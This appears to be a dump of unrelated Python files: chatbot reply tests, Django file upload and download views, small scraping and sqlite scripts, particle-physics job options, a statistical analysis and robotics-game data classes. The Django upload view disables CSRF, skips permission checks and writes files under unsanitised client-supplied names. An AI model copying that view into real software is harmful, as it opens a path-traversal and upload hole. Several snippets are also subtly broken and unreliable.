assert virt.reply("please stop talking") == shun_mode
assert virt.reply("shut up") == shun_mode
assert virt.reply("go away") == shun_mode
def test_sing():
sing = ["${self.toolBox.sing()}"]
assert virt.reply("sing") == sing
def test_exit():
exit = "${exit()}"
assert virt.reply("exit") == exit
assert virt.reply("turn off") == exit
def test_do_you_like():
do_you_like = ["I have never tried ${self.match.group(1)} before","I like whatever you like, NN","It depends, NN"]
assert virt.reply("do you like cats") == do_you_like
assert virt.reply("do you enjoy warrior cats") == do_you_like
def test_say():
say = ["${self.match.group(1)}"]
assert virt.reply("say cat") == say
assert virt.reply("read book") == say
def test_copycat():
copycat = ["${self.match.group(0)}"]
assert virt.reply("copycat") == copycat
assert virt.reply("stop copying me") == copycat
def test_prank():
prank = (["Will do, NN","I would never","Don't give me any ideas"],["${webbrowser.open('https://www.youtube.com/watch?v=dQw4w9WgXcQ')}","${webbrowser.open('http://www.nyan.cat')}"])
assert virt.reply("prank me") == prank
assert virt.reply("please prank me") == prank
def test_kill_me():
kill_me = ["Shall I hire an assassin?"]
assert virt.reply("please kill me") == kill_me
def test_who_am_i():
who_am_i = ["You're NN, NN","You are the one and only NN","I don't answer philosophical questions","${self.toolBox.personLookup(CONTACTS[0]['NN'])}"]
assert virt.reply("who am i") == who_am_i
def test_nice_job():
nice_job = ["sarcasm killed the cat, NN", "Don't expect it"]
assert virt.reply("nice job") == nice_job
assert virt.reply("good job") == nice_job
def test_deny_sarcastic():
deny_sarcastic = ["I totally believe you","Hmm...","Sure...","If you say so"]
assert virt.reply("that wasn't sarcasm") == deny_sarcastic
assert virt.reply("not being sarcastic") == deny_sarcastic
def test_question_sarcasm():
question_sarcasm = ["Everything is sarcasm, NN","Sure...","Not at all","Definitely not","No way",
"Sometimes I'm unintentionally sarcastic"]
assert virt.reply('was that sarcasm') == question_sarcasm
def test_bad_job():
bad_job = ["I gotta set the standards low, NN","You can count on it, NN","Sure!","If you had expected less you wouldn't have been disappointed"]
assert virt.reply("bad job") == bad_job
def test_tell_joke():
tell_joke = ["${self.toolBox.tellAJoke()}"]
assert virt.reply("tell me a joke") == tell_joke
assert virt.reply("make up a joke") == tell_joke
def test_insult_me():
insult_me = ["${self.toolBox.insultMe()}"]
assert virt.reply("insult me") == insult_me
def test_good_dog():
good_dog = ["woof woof!","purr!","I am","Yes you are, yes you are!"]
assert virt.reply("who's a good dog") == good_dog
assert virt.reply("good dog") == good_dog
def test_good_cat():
good_cat = ["woof woof!","purr!","I am","Yes you are, yes you are!","meeeOW!"]
assert virt.reply("good cat") == good_cat
assert virt.reply("who's a good kitty") == good_cat
def test_good_virt():
good_virt = ["I am","Indeed I am","That's me","You know it!"]
assert virt.reply("who's a good virtual assistant") == good_virt
assert virt.reply("good virtual assistant") == good_virt
def test_who_is():
who_is = ["${self.toolBox.personLookup(self.match.group(1))}"]
assert virt.reply('who\'s Pablo?') == who_is
assert virt.reply('who\'re you talking about') == who_is
def test_what_is_a():
what_is_a = ["${self.toolBox.whatIsLookup(self.match.group(1))}"]
assert virt.reply("what is a cat") == what_is_a
assert virt.reply("what's a dog") == what_is_a
def test_hello():
hello = (['hello','what up','howdy','hi','salutations','greetings',"hiya","hey"],", NN")
assert virt.reply("hello") == hello
def test_why_not():
why_not = ["because I said not"]
assert virt.reply("awwww why not") == why_not
assert virt.reply("why not") == why_not
def test_why():
why = ["because I said so"]
assert virt.reply("why?") == why
assert virt.reply("why") == why
def test_oh_really():
oh_really = ["yes, really","nope"]
assert virt.reply("oh really") == oh_really
assert virt.reply("really") == oh_really
def test_dont_ask():
dont_ask = ["don't ask what?","ask what, NN?"]
assert virt.reply("don't ask") == dont_ask
def test_he_is():
he_is = ["who's ${self.match.group(1)}?","how ${self.match.group(1)}","very ${self.match.group(1)}"]
assert virt.reply("he's a dingbat") == he_is
assert virt.reply("he's a moron") == he_is
def test_it_is():
it_is = ["what's ${self.match.group(1)}?","very ${self.match.group(1)}","that's ${self.match.group(1)}"]
assert virt.reply("it is stupid!") == it_is
assert virt.reply("it is wacky") == it_is
def test_that_is():
that_is = ["no way is that ${self.match.group(1)}","it was very ${self.match.group(1)}"]
assert virt.reply("that's crazy") == that_is
assert virt.reply("that's insance") == that_is
def test_are_you():
are_you = ["I am ${self.match.group(1)}","I am not ${self.match.group(1)}"]
assert virt.reply("are you a wizard") == are_you
assert virt.reply("are you a felon?") == are_you
def test_what_do_you():
what_do_you = (["you know what I ${self.match.group(1)}"],[", NN",""])
assert virt.reply("what do you do") == what_do_you
assert virt.reply("what do you eat with your salad") == what_do_you
def test_who_do_you():
who_do_you = (["you should know who I ${self.match.group(1)}","I ${self.match.group(1)} everyone"],[", NN",""])
assert virt.reply("who do you know the best") == who_do_you
assert virt.reply("who do you trust") == who_do_you
def test_when_do_you():
when_do_you = (["I ${self.match.group(1)} whenever I want","I ${self.match.group(1)} all day","I never ${self.match.group(1)}"],[", NN",""])
assert virt.reply("when do you shop at walmart") == when_do_you
assert virt.reply("when do you shower") == when_do_you
def test_where_do_you():
where_do_you = (["I ${self.match.group(1)} all over the place","I ${self.match.group(1)} wherever you want"],[", NN",""])
assert virt.reply("where do you shop") == where_do_you
assert virt.reply("where do you dance") == where_do_you
def test_potty_words():
potty_words = ["No fucking cursing"]
assert virt.reply("fuck yourself") == potty_words
assert virt.reply('damn it') == potty_words
def test_insults():
insults = ["NN! Do not use that foul language in my presence","Insulting your only friend is unwise, NN"]
assert virt.reply("meanie!") == insults
assert virt.reply("idiot") == insults
def test_yes_you_are():
yes_you_are = ["Yes I am!","Yes you are!","No I'm not"]
assert virt.reply("yes, you are") == yes_you_are
assert virt.reply("yes you are") == yes_you_are
def test_celebrate():
celebrate = [r"self.celebrate()${self.match.group(1)}","yay${self.match.group(1)}"]
assert virt.reply("yay!") == celebrate
assert virt.reply("hooray") == celebrate
def test_crying():
crying = ["WA WA WA","Have the onions got you?","Aww, is your lacrymal drainage system malfunctioning?"]
assert virt.reply("waaaaaaaa") == crying
def test_ahh():
ahh = ["A${self.match.group(1)}h"]
assert virt.reply("AHHHHHHHHHHHHHHHHHHHHHH")
def test_laughing():
laughing = ["It's not funny, NN"]
assert virt.reply("hahahahaha") == laughing
assert virt.reply("funny") == laughing
def test_dude():
dude = ['dude']
assert virt.reply("dude") == dude
def test_nice():
nice = ["very ${self.match.group(0)}","such ${self.match.group(0)}"]
assert virt.reply("nice") == nice
assert virt.reply("wow") == nice
def test_okay():
okay = ["OK","okie dokie"]
assert virt.reply("okay") == okay
assert virt.reply("ok") == okay
def test_sorry():
sorry = ["Don't be sorry, NN","You better be sorry!"]
assert virt.reply("sorry") == sorry
def test_what():
what = ["what?","huh?","${self.match.group(0)} indeed"]
assert virt.reply("huh, what!") == what
assert virt.reply("huh") == what
def test_what_ip():
what_ip = ["${self.toolBox.getPublicIP()}"]
assert virt.reply("what's my public ip") == what_ip
assert virt.reply("what is my ip") == what_ip
def test_local_ip():
local_ip = ["${self.toolBox.getLocalIP()}"]
assert virt.reply("what's my local ip") == local_ip
assert virt.reply("what's my private ip") == local_ip |
import os
import logging
import mimetypes
from django.shortcuts import render,HttpResponse
from rest_framework.views import APIView
from django.views.decorators.csrf import csrf_exempt
from django.http import StreamingHttpResponse,FileResponse
from rest_framework.response import Response
from django.utils.http import urlquote
from login.login_token import resolve_token
from course.models import Course
from .models import Resource
from user.models import Teacher
from pathlib import Path
from django.utils._os import safe_join
from SharePlatform.settings import MEDIA_ROOT
# Create your views here.
def hello(request):
return HttpResponse('Hello World!')
class FileUploadView(APIView):
permission_classes = []
path = os.path.join(MEDIA_ROOT,'files')
logger = logging.getLogger('resource.views')
def get(self,request):
return render(self.request,'index.html')
@resolve_token
def post(self, request, args):
"""
上传文件
:param request: 上传文件列表
:param args:
:return:
"""
if args.get('role') == 'student':
return Response({'code': 401, 'msg': 'you have no authority'}, status=200)
files = request.FILES.getlist('file', None) # 获取上传文件列表
if not files:
return Response({'code': 400, 'msg': 'no files upload'},status=200)
course_id = request.query_params.get('id')
file_owner = Teacher.objects.get(uid = args.get('uid'))
print(course_id)
course = Course.objects.get(id=course_id)
self.path = os.path.join(self.path,course.name) # 以课程名为文件夹名
if not os.path.exists(self.path):
self.logger.info('folder is not exist')
os.makedirs(self.path) # 创建存储文件的文件夹
# 文件写入磁盘
for file in files:
self.logger.info('上传'+file.name)
destination = open(os.path.join(self.path, file.name), 'wb')
print('文件名:'+file.name+'\n'+'文件大小:'+str(file.size/1024)+'KB')
for chunk in file.chunks():
destination.write(chunk)
destination.close()
# 文件信息写入数据库
Resource.save_resource(file,course,file_owner)
return Response({'code': 201,'msg': 'upload success'},status=201)
@csrf_exempt # 关闭csrf防护
def dispatch(self, request, *args, **kwargs):
return super(FileUploadView, self).dispatch(request,*args, **kwargs)
class FileDownloadView(APIView):
permission_classes = []
path = os.path.join(MEDIA_ROOT, 'files')
logger = logging.getLogger('resource.views')
def get(self,request, resource_id):
"""
直接下载
:param request:
:param resource_id: 资源id
:return: file
"""
resource = Resource.objects.get(pk=resource_id)
self.path = os.path.join(self.path,resource.path)
file_name = resource.name
if not os.path.exists(self.path):
return Response({'code': 404,'msg':'资源找不到'},status = 404)
self.logger.info('下载' + file_name)
resource.download_count=resource.download_count+1
resource.save()
response = StreamingHttpResponse(file_iterator(self.path))
response['Content-Type'] = 'application/octet-stream' # 文件流格式
response['Content-Disposition'] = 'attachment;filename="%s"' % (urlquote(file_name)) # 下载显示文件名中文必须加上urlquote进行编码
return response
def post(self,request):
"""
文件下载
:param request: recourseId
:return:msg
"""
file_path = request.data.get('filePath','《算法图解》.pdf')
file_name = request.data.get('fileName','《算法图解》.pdf')
if not file_path:
return HttpResponse('no filePath')
#ab_file_path = os.path.join(self.path,file_path)
ab_file_path = Path(safe_join(self.path, file_path))
response = FileResponse(ab_file_path.open('rb'), content_type='application/pdf')
# response = StreamingHttpResponse(file_iterator(ab_file_path))
# response['Content-Type'] = 'application/octet-stream' # 文件流格式
#response['Content-Type'] = 'application/pdf' # pdf格式
response['Content-Disposition'] = 'attachment;filename="%s"' % (urlquote(file_name)) # 下载显示文件名中文必须加上urlquote进行编码
return response
def preview(request):
"""
资源预览
:param request:
:return:
"""
if request.method == 'POST':
return HttpResponse('hello word')
path = 'E:\\receive\\resources'
file_path = 'django简介.pptx'
file_name = '《算法图解》.pdf'
if not file_path:
return HttpResponse('no filePath')
# ab_file_path = os.path.join(self.path,file_path)
ab_file_path = Path(safe_join(path, file_path))
content_type, encoding = mimetypes.guess_type(str(ab_file_path))
content_type = content_type or 'application/octet-stream'
response = FileResponse(ab_file_path.open('rb'), content_type=content_type)
return response
def file_iterator(file_path, chunk_size=512):
"""
生成器函数,分块读取磁盘文件
:param file_path: 文件绝对路径
:param chunk_size: 块大小
:return:
"""
with open(file_path, 'rb') as f:
while True:
c = f.read(chunk_size)
if c:
yield c
else:
break
|
import instaloader
ob = instaloader.Instaloader()
user = input("Enter username")
ob.download_profile(user,profile_pic=True) |
import requests
x = requests.get("www.google.com")
print(x) |
import sqlite3 #导入模块
conn = sqlite3.connect('example.db') #连接数据库
c = conn.cursor()
# 创建表
#c.execute('''CREATE TABLE stocks (date text, trans text, symbol text, qty real, price real)''')
c.execute("CREATE TABLE stocks2 (date text, trans text, symbol text, qty real, price real) ")
# 插入一条记录
c.execute("INSERT INTO stocks2 VALUES ('2006-01-05','BUY', 'RHAT', 100, 35.14)")
# 提交当前事务,保存数据
for row in c.execute('SELECT * FROM stocks ORDER BY price'):
print(row)
for row in c.execute('SELECT * FROM stocks2 ORDER BY price'):
print(row)
conn.commit()
# 关闭数据库连接
conn.close()
|
#-- GAUDI jobOptions generated on Mon Jul 6 15:28:35 2015
#-- Contains event types :
#-- 13104231 - 32 files - 522500 events - 105.29 GBytes
#-- Extra information about the data processing phases:
#-- Processing Pass Step-124834
#-- StepId : 124834
#-- StepName : Reco14a for MC
#-- ApplicationName : Brunel
#-- ApplicationVersion : v43r2p7
#-- OptionFiles : $APPCONFIGOPTS/Brunel/DataType-2012.py;$APPCONFIGOPTS/Brunel/MC-WithTruth.py;$APPCONFIGOPTS/Persistency/Compression-ZLIB-1.py
#-- DDDB : fromPreviousStep
#-- CONDDB : fromPreviousStep
#-- ExtraPackages : AppConfig.v3r164
#-- Visible : Y
#-- Processing Pass Step-124620
#-- StepId : 124620
#-- StepName : Digi13 with G4 dE/dx
#-- ApplicationName : Boole
#-- ApplicationVersion : v26r3
#-- OptionFiles : $APPCONFIGOPTS/Boole/Default.py;$APPCONFIGOPTS/Boole/DataType-2012.py;$APPCONFIGOPTS/Boole/Boole-SiG4EnergyDeposit.py;$APPCONFIGOPTS/Persistency/Compression-ZLIB-1.py
#-- DDDB : fromPreviousStep
#-- CONDDB : fromPreviousStep
#-- ExtraPackages : AppConfig.v3r164
#-- Visible : Y
#-- Processing Pass Step-124632
#-- StepId : 124632
#-- StepName : TCK-0x409f0045 Flagged for Sim08 2012
#-- ApplicationName : Moore
#-- ApplicationVersion : v14r8p1
#-- OptionFiles : $APPCONFIGOPTS/Moore/MooreSimProductionWithL0Emulation.py;$APPCONFIGOPTS/Conditions/TCK-0x409f0045.py;$APPCONFIGOPTS/Moore/DataType-2012.py;$APPCONFIGOPTS/L0/L0TCK-0x0045.py
#-- DDDB : fromPreviousStep
#-- CONDDB : fromPreviousStep
#-- ExtraPackages : AppConfig.v3r164
#-- Visible : Y
#-- Processing Pass Step-125336
#-- StepId : 125336
#-- StepName : Sim08a - 2012 - MD - Pythia8
#-- ApplicationName : Gauss
#-- ApplicationVersion : v45r3
#-- OptionFiles : $APPCONFIGOPTS/Gauss/Sim08-Beam4000GeV-md100-2012-nu2.5.py;$DECFILESROOT/options/@{eventType}.py;$LBPYTHIA8ROOT/options/Pythia8.py;$APPCONFIGOPTS/Gauss/G4PL_FTFP_BERT_EmNoCuts.py;$APPCONFIGOPTS/Persistency/Compression-ZLIB-1.py
#-- DDDB : Sim08-20130503-1
#-- CONDDB : Sim08-20130503-1-vc-md100
#-- ExtraPackages : AppConfig.v3r171;DecFiles.v27r8
#-- Visible : Y
#-- Processing Pass Step-124630
#-- StepId : 124630
#-- StepName : Stripping20-NoPrescalingFlagged for Sim08
#-- ApplicationName : DaVinci
#-- ApplicationVersion : v32r2p1
#-- OptionFiles : $APPCONFIGOPTS/DaVinci/DV-Stripping20-Stripping-MC-NoPrescaling.py;$APPCONFIGOPTS/DaVinci/DataType-2012.py;$APPCONFIGOPTS/DaVinci/InputType-DST.py;$APPCONFIGOPTS/Persistency/Compression-ZLIB-1.py
#-- DDDB : fromPreviousStep
#-- CONDDB : fromPreviousStep
#-- ExtraPackages : AppConfig.v3r164
#-- Visible : Y
from Gaudi.Configuration import *
from GaudiConf import IOHelper
IOHelper('ROOT').inputFiles(['LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000001_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000002_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000003_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000004_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000005_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000006_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000007_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000008_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000009_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000010_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000011_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000012_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000013_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000014_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000015_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000016_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000017_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000018_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000019_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000020_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000021_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000022_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000024_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000025_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000026_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000027_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000028_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000029_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000030_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000031_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000032_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/00027733_00000033_1.allstreams.dst'
], clear=True)
|
from glmnet import LogitNet
import matplotlib as mpl
import numpy as np
import pandas as pd
from sklearn import metrics
from sklearn.preprocessing import StandardScaler
from tqdm import tqdm
from sample import sample_equal_proportion
# Set matplotlib settings
mpl.get_backend()
mpl.use('TkAgg')
import matplotlib.pyplot as plt
plt.style.use('ggplot')
# Constants
EXCLUDE_AGE = False
TRAIN_SIZE = 0.667
MAX_ITER = 1e6
ALPHA = 1
N_LAMBDA = 200
N_FOLDS = 5
N_DIVISIONS = 1000
N_ITERATIONS = 10
CUT_POINT = 0 # use 0 for minimum, 1 for within 1 SE
SURVIVAL_RATE_CUTOFF = 0.05
SHOW = False
SAVE = True
# Load data
data = pd.read_table('../data/cocaine_dependence.txt')
# Drop subjects column
data = data.drop('subject', axis=1)
# Possibly exclude age
if EXCLUDE_AGE:
data = data.drop('AGE', axis=1)
# Handle dependent variables
y = data['DIAGNOSIS'].values
data = data.drop('DIAGNOSIS', axis=1)
# Handle categorical variable
male = np.array([data['Male'].values]).T
data = data.drop('Male', axis=1)
X_raw = data.values
# Handle numeric variables
stdsc = StandardScaler()
X_std = stdsc.fit_transform(X_raw)
# Combine categorical variables and continuous variables
X = np.concatenate([male, X_std], axis=1)
##############################################################################
# Replicating figure 1 - Done!
##############################################################################
# Create temporary containers
coefs = []
# Loop over number of iterations
for i in tqdm(range(N_ITERATIONS)):
# Fit LogisticNet with the training set
lr = LogitNet(alpha=ALPHA, n_lambda=N_LAMBDA, standardize=False, cut_point=CUT_POINT, max_iter=MAX_ITER)
lr = lr.fit(X, y)
# Extract and save coefficients
coefs.append(list(lr.coef_[0]))
coefs = np.array(coefs)
survived = 1 * (abs(coefs) > 0)
survival_rate = np.sum(survived, axis=0) / float(N_ITERATIONS)
mask = 1 * (survival_rate > SURVIVAL_RATE_CUTOFF)
coefs_updated = coefs * mask
variable_names = ['Male'] + list(data.columns)
coefs_q025 = np.percentile(coefs_updated, q=2.5, axis=0)
coefs_mean = np.mean(coefs_updated, axis=0)
coefs_q975 = np.percentile(coefs_updated, q=97.5, axis=0)
betas = pd.DataFrame({'mean': coefs_mean})
betas['lb'] = coefs_q025
betas['ub'] = coefs_q975
betas['survival'] = mask
betas['predictor'] = variable_names
betas['sig'] = betas['survival']
betas['dotColor1'] = 1 * (betas['mean'] != 0)
betas['dotColor2'] = (1 * np.logical_and(betas['dotColor1'] > 0, betas['sig'] > 0)) + 1
betas['dotColor'] = betas['dotColor1'] * betas['dotColor2']
betas.to_csv('./betas.csv', index=False)
##############################################################################
# Replicating figure 2 - Done!
##############################################################################
# Split data
mask = sample_equal_proportion(y, proportion=TRAIN_SIZE, random_state=43210)
y_train = y[mask]
y_test = y[np.logical_not(mask)]
X_train = X[mask, :]
X_test = X[np.logical_not(mask), :]
# Create temporary containers
all_y_train_scores = []
all_y_test_scores = []
# Loop over number of iterations
for i in tqdm(range(N_ITERATIONS)):
# Fit LogisticNet with the training set
lr = LogitNet(alpha=ALPHA, n_lambda=N_LAMBDA, standardize=False, n_folds=N_FOLDS, max_iter=MAX_ITER, random_state=i)
lr = lr.fit(X_train, y_train)
# Identify and save the best lambda
lamb = lr.lambda_max_
# Generate scores for training and test sets
y_train_scores = lr.predict_proba(X_train, lamb=lamb)[:, 1]
y_test_scores = lr.predict_proba(X_test, lamb=lamb)[:, 1]
# Save AUCs
all_y_train_scores.append(y_train_scores)
all_y_test_scores.append(y_test_scores)
# Generate scores for training and test sets
all_y_train_scores = np.array(all_y_train_scores)
y_train_scores_mean = np.mean(all_y_train_scores, axis=0)
all_y_test_scores = np.array(all_y_test_scores)
y_test_scores_mean = np.mean(all_y_test_scores, axis=0)
# Compute ROC curve and ROC area for each class
n_classes = 2
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(n_classes):
fpr[i], tpr[i], _ = metrics.roc_curve(y_train, y_train_scores_mean)
roc_auc[i] = metrics.auc(fpr[i], tpr[i])
# Compute train ROC curve
plt.figure()
plt.plot(fpr[1], tpr[1], color='black',
lw=2, label='AUC = %.3f' % roc_auc[1])
plt.plot([0, 1], [0, 1], color='black', lw=2, linestyle='--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('1 - Specificity')
plt.ylabel('Sensitivity')
plt.title('ROC Curve (Training Set)')
plt.legend(loc="lower right")
if SHOW:
plt.show()
if SAVE:
plt.savefig('./train_roc_curve.png')
# Compute ROC curve and ROC area for each class
n_classes = 2
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(n_classes):
fpr[i], tpr[i], _ = metrics.roc_curve(y_test, y_test_scores_mean)
roc_auc[i] = metrics.auc(fpr[i], tpr[i])
# Compute test ROC curve
plt.figure()
plt.plot(fpr[1], tpr[1], color='black',
lw=2, label='AUC = %.3f' % roc_auc[1])
plt.plot([0, 1], [0, 1], color='black', lw=2, linestyle='--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('1 - Specificity')
plt.ylabel('Sensitivity')
plt.title('ROC Curve (Test Set)')
plt.legend(loc="lower right")
if SHOW:
plt.show()
if SAVE:
plt.savefig('./test_roc_curve.png')
##############################################################################
# Replicating figure 4 - Done!
##############################################################################
# Create temporary containers
all_train_aucs = []
all_test_aucs = []
# Loop over number of divisions
for i in tqdm(range(N_DIVISIONS)):
# Split data
mask = sample_equal_proportion(y, proportion=TRAIN_SIZE, random_state=i)
y_train = y[mask]
y_test = y[np.logical_not(mask)]
X_train = X[mask, :]
X_test = X[np.logical_not(mask), :]
# Create temporary containers
train_aucs = []
test_aucs = []
# Loop over number of iterations
for j in range(N_ITERATIONS):
# Fit LogisticNet with the training set
lr = LogitNet(alpha=ALPHA, n_lambda=N_LAMBDA, standardize=False, n_folds=N_FOLDS, max_iter=MAX_ITER, random_state=j)
lr = lr.fit(X_train, y_train)
# Identify and save the best lambda
lamb = lr.lambda_max_
# Generate scores for training and test sets
y_train_scores = lr.predict_proba(X_train, lamb=lamb)[:, 1]
y_test_scores = lr.predict_proba(X_test, lamb=lamb)[:, 1]
# Calculate AUC on training and test sets
train_auc = metrics.roc_auc_score(y_train, y_train_scores)
test_auc = metrics.roc_auc_score(y_test, y_test_scores)
# Save AUCs
train_aucs.append(train_auc)
test_aucs.append(test_auc)
# Process loop and save in temporary containers
all_train_aucs.append(np.mean(train_aucs))
all_test_aucs.append(np.mean(test_aucs))
all_train_aucs = np.array(all_train_aucs)
all_train_auc_mean = np.mean(all_train_aucs)
all_test_aucs = np.array(all_test_aucs)
all_test_auc_mean = np.mean(all_test_aucs)
bins = np.arange(0, 1, 0.02)
plt.figure()
plt.hist(all_train_aucs, bins=bins, color='white', edgecolor='black')
plt.axvline(x=all_train_auc_mean, color='black', linestyle='--')
plt.annotate('Mean AUC = %.3f' % all_train_auc_mean, xy=(150, 200), xycoords='figure pixels', size=28)
plt.xlim([0.0, 1.0])
plt.xlabel('AUC')
plt.ylabel('Frequency')
plt.title('Distribution of AUCs (Training Set)')
if SHOW:
plt.show()
if SAVE:
plt.savefig('./train_auc_distribution.png')
plt.figure()
plt.hist(all_test_aucs, bins=bins, color='white', edgecolor='black')
plt.axvline(x=all_test_auc_mean, color='black', linestyle='--')
plt.annotate('Mean AUC = %.3f' % all_test_auc_mean, xy=(150, 200), xycoords='figure pixels', size=28)
plt.xlim([0.0, 1.0])
plt.xlabel('AUC')
plt.ylabel('Frequency')
plt.title('Distribution of AUCs (Test Set)')
if SHOW:
plt.show()
if SAVE:
plt.savefig('./test_auc_distribution.png')
|
import sys
from math import factorial
if __name__ == "__main__":
'''
Given: Positive integers n and m with 0≤m≤n≤2000.
Return: The sum of combinations C(n,k) for all k satisfying m≤k≤n, modulo 1,000,000. In shorthand, ∑nk=m(nk).
'''
n, m = map(int, sys.stdin.read().splitlines()[0].split())
total = 0
for i in range(m, n + 1):
total += factorial(n) // (factorial(i) * factorial(n - i))
print(total % int(1e6)) |
from . import question_logit
from . import symbol_cost
from . import symbol_features
|
class Alliance(object):
def __init__(self, score=None, teams=[]):
self.teams = teams
self.score = score
class Alliance2017(Alliance):
def __init__(
self,
score=None,
teams=[],
fuel_score=None,
fuel_count=None,
rotor_count=None,
touchpad_count=None):
super(Alliance2017, self).__init__(score=score, teams=teams)
self.fuel_score = fuel_score
self.fuel_count = fuel_count
self.rotor_count = rotor_count
self.touchpad_count = touchpad_count
def getString(self, prefix):
return (
'{} score: {}\n'.format(prefix, self.score) + \
'{} fuel_score: {}\n'.format(prefix, self.fuel_score) + \
'{} fuel_count: {}\n'.format(prefix, self.fuel_count) + \
'{} rotor_count: {}\n'.format(prefix, self.rotor_count) + \
'{} touchpad_count: {}\n'.format(prefix, self.touchpad_count)
)
class Alliance2018(Alliance):
def __init__(
self,
score=None,
teams=[],
boost_count=None,
boost_played=None,
force_count=None,
force_played=None,
levitate_count=None,
levitate_played=None,
switch_owned=None,
scale_owned=None,
current_powerup=None,
powerup_time_remaining=None,
auto_quest=None,
face_the_boss=None,
):
super(Alliance2018, self).__init__(score=score, teams=teams)
self.boost_count = boost_count
self.boost_played = boost_played
self.force_count = force_count
self.force_played = force_played
self.levitate_count = levitate_count
self.levitate_played = levitate_played
self.switch_owned = switch_owned
self.scale_owned = scale_owned
self.current_powerup = current_powerup
self.powerup_time_remaining = powerup_time_remaining
self.auto_quest = auto_quest
self.face_the_boss = face_the_boss
def getString(self, prefix):
return (
'{} score: {}\n'.format(prefix, self.score) + \
'{} force_count: {}\n'.format(prefix, self.force_count) + \
'{} force_played: {}\n'.format(prefix, self.force_played) + \
'{} levitate_count: {}\n'.format(prefix, self.levitate_count) + \
'{} levitate_played: {}\n'.format(prefix, self.levitate_played) + \
'{} boost_count: {}\n'.format(prefix, self.boost_count) + \
'{} boost_played: {}\n'.format(prefix, self.boost_played) + \
'{} switch_owned: {}\n'.format(prefix, self.switch_owned) + \
'{} scale_owned: {}\n'.format(prefix, self.scale_owned) + \
'{} current_powerup: {}\n'.format(prefix, self.current_powerup) + \
'{} powerup_time_remaining: {}\n'.format(prefix, self.powerup_time_remaining) + \
'{} auto_quest: {}\n'.format(prefix, self.auto_quest) + \
'{} face_the_boss: {}\n'.format(prefix, self.face_the_boss)
)
class Alliance2019(Alliance):
def __init__(
self,
score=None,
teams=[],
robot1_starting_level=None,
robot1_hab_line_cross=None,
robot1_ending_level=None,
robot2_starting_level=None,
robot2_hab_line_cross=None,
robot2_ending_level=None,
robot3_starting_level=None,
robot3_hab_line_cross=None,
robot3_ending_level=None,
cargo_ship_hatch_count=None,
cargo_ship_cargo_count=None,
rocket1_hatch_count=None,
rocket1_cargo_count=None,
rocket2_hatch_count=None,
rocket2_cargo_count=None,
rocket_rp=None,
hab_rp=None,
):
super(Alliance2019, self).__init__(score=score, teams=teams)
self.robot1_starting_level = robot1_starting_level
self.robot1_starting_level = robot1_starting_level
self.robot1_hab_line_cross = robot1_hab_line_cross
self.robot1_ending_level = robot1_ending_level
self.robot2_starting_level = robot2_starting_level
self.robot2_hab_line_cross = robot2_hab_line_cross
self.robot2_ending_level = robot2_ending_level
self.robot3_starting_level = robot3_starting_level
self.robot3_hab_line_cross = robot3_hab_line_cross
self.robot3_ending_level = robot3_ending_level
self.cargo_ship_hatch_count = cargo_ship_hatch_count
self.cargo_ship_cargo_count = cargo_ship_cargo_count
self.rocket1_hatch_count = rocket1_hatch_count
self.rocket1_cargo_count = rocket1_cargo_count
